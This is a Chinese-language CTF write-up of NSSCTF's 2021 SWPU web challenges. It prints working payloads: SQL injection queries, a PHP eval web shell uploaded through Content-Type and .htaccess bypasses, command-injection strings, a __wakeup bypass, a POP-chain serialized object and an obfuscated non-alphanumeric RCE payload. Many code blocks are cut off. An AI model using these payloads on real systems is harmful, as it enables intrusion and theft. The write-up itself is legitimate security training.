【NSSCTF】2021SWPU-web
[TOC]
SWPU:
web:
gift_F12:
直接查看源码:
easy_md5
数组绕过
<?php |
这次真的学到了!!!
关于MD5函数代码审计:
https://blog.csdn.net/qq_42777804/article/details/90547641
easy_sql:
sqlmap一把梭
current database: ‘test_db’
第二种:手注!
这个题真的很easy,结果我整偏了,最后搞报错注入!
union联合注入
首先测试order by 查字段:
/?wllm=1'order by 1--+ T |
一共有三列。
接着查数据库:
/?wllm=-1'union select 1,database(),3 --+ |
数据库为test_db
然后查数据库中的表名:
/?wllm=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='test_db'--+ |
爆表:
?wllm=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘test_db’ and table_name=‘test_tb’ --+ |
test_tb一共有两个字段,flag和id。
最后获取flag:
?wllm=-1'union select 1,database(),flag from test_tb --+ |
jicao
<?php |
直接构造:
payload: /?json={"x":"wllm"} |
这个题考察json格式,很简单。
caidao:
题目中给了提示,直接连接菜刀 wllm,
do you know http:
直接修改用户代理为wllm。
./uplo4d/bd914ca4997d34857501cefab0064162.phtml
RA+K+8ei+_sf
easyupload1.0
典型的文件上传:
传图片成功:
修改Content-Type: image/jpeg
可以成功传马
eval($_POST['dccomics']) @ |
连接蚁剑对应目录:http://1.14.71.254:28126/upload/shell.php
显示成功:
找到了flag.php,但是是假的:
真的flag在environment环境变量中,再打上去一个可以执行phpinfo()的文件就行(因为php被禁了,自然是要绕过)
phtml也被过滤了
上传一个system.jpg:
GIF89a |
记得改为php文件就行:
在蚁剑里刷新一下就行:
在网页里访问system.php:
平台老出bug,解决不了,哭了
突然上传成功了! happy!!!
easyupload2.0
这道题可以用phtml直接打:
GIF89a |
easy-rce
<?php |
通过代码块可得:
必须有url变量,并且eval变量所对应的内容会被get方法传参给eval()函数得到回响。
?url=system("ls /"); |
?url=system("cat /flllllaaaaaaggggggg"); |
baby-rce
http://9511-5105c14c-fe3b-4356.nss.ctfer.vip:9080/rasalghul.php/?url=ls${IFS}/ |
http://9511-5105c14c-fe3b-4356.nss.ctfer.vip:9080/rasalghul.php/?url=cat${IFS}/flllllaaaaaaggggggg |
ez_unserialize
源码:
使用dirsearch进行扫描:
查询robots.txt
源码:
|
代码中是一个主类wllm,有两个变量$admin和passwd |
这个题没有用到GC机制,所以不用将变量数修改为3或其他大于3的数字。
include
题目中说让上传一个文件
源码:
|
这道题就是一个简单的php伪协议:
?file=php://filter/convert.base64-encode/resource=flag.php |
pgsql: sql injection quine
error
这道题是一道sql注入
方法1:SQLMAP一把梭
爆库: |
爆表: |
爆字段: |
爆FLAG: |
方法2:报错注入
爆库: |
爆表: |
查flag: |
但是只查到前半段:
update存在位数限制,使用substr()进行截取后半段:
1' and updatexml(1,concat(0x7e,substr((select flag from test_tb),32,64)),1) --+ |
no_wakeup
首先是一个非常萌的派蒙,打开是代码审计,一个字,审!
|
代码中一共有一个HaHaHa类,其中有admin和passwd两个公共变量,只要执行到__destruct()方法就可以得到flag。
难点:绕过__wakeup()方法
这是一个典型的漏洞:CVE-2016-7124
只需要对象那个属性的值大于真实属性的个数就OK。
将Object后面的2改成3就可以了。
O:6:“HaHaHa”:3:{s:5:“admin”;s:5:“admin”;s:6:“passwd”;s:4:“wllm”;} |
感谢师傅:vscode+phpstudy
easyupload3.0
这是一道文件上传的题,通过随意注错发现:
中间件是Apache/2.4.7,于是想到题目中title说试试和某些文件配合,使用.htaccess来getshell:
首先先上传一个.htaccess文件:
<FilesMatch "dc"> |
这个文件是分布式配置文件,只要AllowOverride All就可以执行,执行的内容是所有上传文件中带有dc的文件均以php文件执行。(但是我最开始是上传不了的,只能更改后缀匹配,事实上执行内容不仅仅匹配后缀,而是全局匹配。因此上传的文件有无后缀无所谓。)
接着上传图片马:
可以验证一下是否执行:
没有显示不可显示就说明成功了!
然后就该蚁剑上场:
打进来了!
得到flag.
finalrce
无回显RCE
第一种:反弹shell |
这里过滤了大部分的反弹shell。
但因为靶机不能连接外网,所以使用方法三。
首先生成目录文件: |
访问文件:
找到flag,使用tac代替cat,但是la被过滤,使用?代替。 |
?url=tac /flllll?aaaaaggggggg |tee wllm |
hardrce
大佬博客:无字母数字RCE
无字母RCE
不能用^符号,这里用到了取反,因为~没被过滤
取反一般用到的都是不可见字符,不会触发正则表达式:
使用套神给的脚本:
s = "ls" |
首先使用
?wllm=phpinfo(); |
?wllm=system(ls /) |
?wllm=system(cat /flllllaaaaaaggggggg); |
pop
|
这里有三个类,其中能够直接调用的魔术方法只有destruct,拥有该方法的w22m类只有w00m这个
变量,但这里pop的魅力就来了,如果让w00m这个变量赋值为一个对象,触发toString的一个方式
中就有echo一个对象,于是就让w22m中的w00m这个属性赋值为w33m这个对象,同理通过w33m
中的这句$this->w00m->{$this->w22m}()来跳到w44m中的Getflag从而到达控制变量的效果.
这个题目需要自己多理解!!!
payload:
?w00m=O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D; |
PseudoProtocols
php伪协议:
?wllm=php://filter/read=convert.base64-encode/resource=hint.php |
经过base64解码:
进入目录:
file_get_contents()如何绕过? |
sql
|
Your Login name:LTLT_flag,users |
?wllm= |
Your Login name:id,flag,id,username, |
?wllm=-1'/**/union/**/select/**/1,database(),flag/**/from/**/LTLT_flag/**/having/**/'1'/**/like/**/'1 |
这里由于禁了right,使用mid()
-1'/**/union/**/select/**/1,database(),mid(flag,1,40)/**/from/**/LTLT_flag/**/having/**/'1'/**/like/**/'1 |
NSSCTF{913183bf-4237-46ee-87fc-bf5cea266562} |
babyunser
upload/5ad7c2191968b93f121869cd84f4e1b0.txt |
hardrce_3
这道题使用自增:
%24_%3D%5B%5D%3B%24_%3D%40%22%24_%22%3B%24_%3D%24_%5B'!'%3D%3D'%40'%5D%3B%24___%3D%24_%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24____%3D'_'%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24_%3D%24%24____%3B%24___(%24_%5B_%5D)%3B |
POST: |